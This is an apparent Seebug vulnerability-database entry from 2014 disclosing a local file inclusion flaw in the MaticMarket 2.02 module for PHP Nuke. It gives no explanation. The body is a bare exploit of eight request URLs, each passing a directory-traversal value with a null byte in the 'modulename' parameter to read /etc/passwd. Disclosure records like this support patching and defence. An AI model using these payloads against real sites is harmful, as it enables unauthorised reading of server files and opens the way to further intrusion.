MaticMarket 2.02 for PHP Nuke LFI Vulnerability

2014-07-01T00:00:00
ID SSV:70428
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #MaticMarket 2.02 for PHP Nuke LFI Vulnerability
#Url: http://sourceforge.net/projects/maticmarket
#Author: xer0x
#Expl:
http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/deco/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00